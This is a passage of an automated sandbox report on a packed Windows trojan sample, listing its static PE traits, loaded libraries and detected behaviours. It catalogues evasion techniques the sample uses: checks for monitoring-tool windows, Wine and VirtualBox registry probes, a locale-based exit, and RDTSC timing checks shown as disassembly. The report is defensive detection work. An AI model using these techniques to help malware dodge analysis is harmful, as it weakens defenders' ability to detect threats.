              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069C5BF0_2_0069C5BF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008066C30_2_008066C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F76220_2_007F7622
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091F6FF0_2_0091F6FF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008016640_2_00801664
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074BF840_2_0074BF84
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00444A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: cdtaybca ZLIB complexity 0.9947091291603631
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00463A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00463A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0045CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\AU3S3VHT.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1798656 > 1048576
              Source: file.exeStatic PE information: Raw size of cdtaybca is bigger than: 0x100000 < 0x19d200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.440000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cdtaybca:EW;xngaqtmq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cdtaybca:EW;xngaqtmq:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00466390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00466390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b938c should be: 0x1c403f
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: cdtaybca
              Source: file.exeStatic PE information: section name: xngaqtmq
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF076 push 042FF97Bh; mov dword ptr [esp], edx0_2_007FF0DB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF076 push esi; mov dword ptr [esp], ebx0_2_007FF11A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF076 push edx; mov dword ptr [esp], ecx0_2_007FF197
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF076 push esi; mov dword ptr [esp], edi0_2_007FF1E6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086D094 push 0C8A10CEh; mov dword ptr [esp], ecx0_2_0086D0A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008748BD push edx; mov dword ptr [esp], 3EA5858Ch0_2_008748E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE0D0 push 1829A300h; mov dword ptr [esp], edi0_2_008AE0DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AE0D0 push 32F442D4h; mov dword ptr [esp], ecx0_2_008AE13E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082F0E6 push esi; mov dword ptr [esp], 7C0F7476h0_2_0082F124
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082F0E6 push 7A302C76h; mov dword ptr [esp], ebx0_2_0082F133
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082F0E6 push ebx; mov dword ptr [esp], 572978B5h0_2_0082F164
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088B8ED push 6F76F111h; mov dword ptr [esp], ecx0_2_0088B906
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087A806 push 0250A8B9h; mov dword ptr [esp], esi0_2_0087A829
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB81B push ebp; mov dword ptr [esp], esi0_2_008EB845
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EB81B push 2C90B2D7h; mov dword ptr [esp], edi0_2_008EB8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00874810 push esi; mov dword ptr [esp], 736D0040h0_2_0087484B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A883D push edi; mov dword ptr [esp], 5BB6E068h0_2_008A8864
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A883D push ebp; mov dword ptr [esp], esi0_2_008A88E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A883D push 1B6C37A2h; mov dword ptr [esp], edi0_2_008A8902
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A883D push 6D6E6E4Dh; mov dword ptr [esp], edi0_2_008A894B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ecx; mov dword ptr [esp], edx0_2_007FC937
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ebp; mov dword ptr [esp], 57FB4FB8h0_2_007FCA08
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ebp; mov dword ptr [esp], ebx0_2_007FCAF3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 722F8096h; mov dword ptr [esp], edi0_2_007FCB06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ebx; mov dword ptr [esp], edi0_2_007FCB20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ecx; mov dword ptr [esp], eax0_2_007FCC24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 21169314h; mov dword ptr [esp], edi0_2_007FCC9A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push edx; mov dword ptr [esp], ebx0_2_007FCD37
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 6FC46D4Ch; mov dword ptr [esp], ebx0_2_007FCD7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 694341A3h; mov dword ptr [esp], ecx0_2_007FCE28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 4DBF01CAh; mov dword ptr [esp], esi0_2_007FCE8D
              Source: file.exeStatic PE information: section name: cdtaybca entropy: 7.954402034291771

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00466390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00466390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25980
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CF92 second address: 80CFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CFA1 second address: 80CFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F712C second address: 7F7136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7136 second address: 7F713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0B3 second address: 80C0C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0C3 second address: 80C0CD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE8A0813DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0CD second address: 80C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0D3 second address: 80C0F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A0813DB3h 0x00000008 jl 00007FE8A0813DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C3F9 second address: 80C422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007FE8A076DDD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FE8A076DDC6h 0x00000013 jns 00007FE8A076DDC6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C552 second address: 80C558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C558 second address: 80C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C7F7 second address: 80C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C7FB second address: 80C807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810465 second address: 8104A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE8A0813DA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov di, si 0x00000029 push 2CB18A69h 0x0000002e pushad 0x0000002f jbe 00007FE8A0813DACh 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8104A5 second address: 810524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE8A076DDC8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 2CB18AE9h 0x00000014 mov dword ptr [ebp+122D1939h], edx 0x0000001a push 00000003h 0x0000001c sbb dx, 247Fh 0x00000021 call 00007FE8A076DDD5h 0x00000026 add di, 88C8h 0x0000002b pop edx 0x0000002c push 00000000h 0x0000002e push 00000003h 0x00000030 mov edi, edx 0x00000032 call 00007FE8A076DDC9h 0x00000037 ja 00007FE8A076DDE5h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FE8A076DDCCh 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810524 second address: 810562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE8A0813DB9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE8A0813DB7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810562 second address: 810583 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE8A076DDD3h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810583 second address: 81058D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81058D second address: 8105FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A076DDD8h 0x00000008 jmp 00007FE8A076DDD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FE8A076DDD6h 0x00000018 pop eax 0x00000019 lea ebx, dword ptr [ebp+12454316h] 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FE8A076DDC8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jnp 00007FE8A076DDC6h 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810665 second address: 81066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81066A second address: 8106C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A076DDD9h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push edx 0x00000011 jmp 00007FE8A076DDD7h 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 sub esi, dword ptr [ebp+122D35FFh] 0x0000001f call 00007FE8A076DDC9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jns 00007FE8A076DDC8h 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106C2 second address: 8106D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A0813DAEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106D4 second address: 8106EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FE8A076DDD4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FE8A076DDC6h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106EF second address: 810727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a js 00007FE8A0813DB9h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FE8A0813DAAh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810727 second address: 810750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE8A076DDD5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810750 second address: 8107AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 call 00007FE8A0813DABh 0x0000000d mov edi, dword ptr [ebp+122D37E7h] 0x00000013 pop ecx 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE8A0813DA8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 or edx, dword ptr [ebp+122D35EFh] 0x00000038 push 00000003h 0x0000003a sub dword ptr [ebp+122D19F2h], edx 0x00000040 push 92EE277Fh 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push ecx 0x00000049 pop ecx 0x0000004a jl 00007FE8A0813DA6h 0x00000050 popad 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108FA second address: 810913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810913 second address: 810918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810918 second address: 81091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81091E second address: 810922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810922 second address: 810935 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b jc 00007FE8A076DDCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810935 second address: 8109B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007FE8A0813DB0h 0x0000000e pop eax 0x0000000f jmp 00007FE8A0813DB7h 0x00000014 clc 0x00000015 lea ebx, dword ptr [ebp+1245432Ah] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FE8A0813DA8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D1AFAh], esi 0x0000003d jmp 00007FE8A0813DACh 0x00000042 popad 0x00000043 pop edi 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jnl 00007FE8A0813DACh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F3F6 second address: 82F3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F3FC second address: 82F400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F400 second address: 82F40A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE8A076DDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F6E8 second address: 82F6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83008C second address: 830090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830090 second address: 830094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830094 second address: 8300A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FE8A076DDDAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83024D second address: 830253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830253 second address: 830259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83038B second address: 8303A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A0813DA6h 0x0000000a jmp 00007FE8A0813DB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8303A9 second address: 8303C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE8A076DDD8h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82732A second address: 827330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827330 second address: 82733E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE8A076DDC6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83054C second address: 830570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB5h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jo 00007FE8A0813DA6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830570 second address: 83058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830C6F second address: 830C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830F12 second address: 830F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8321DC second address: 8321E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8321E0 second address: 832214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FE8A076DDC6h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 jo 00007FE8A076DDE4h 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007FE8A076DDC6h 0x00000021 rdtsc
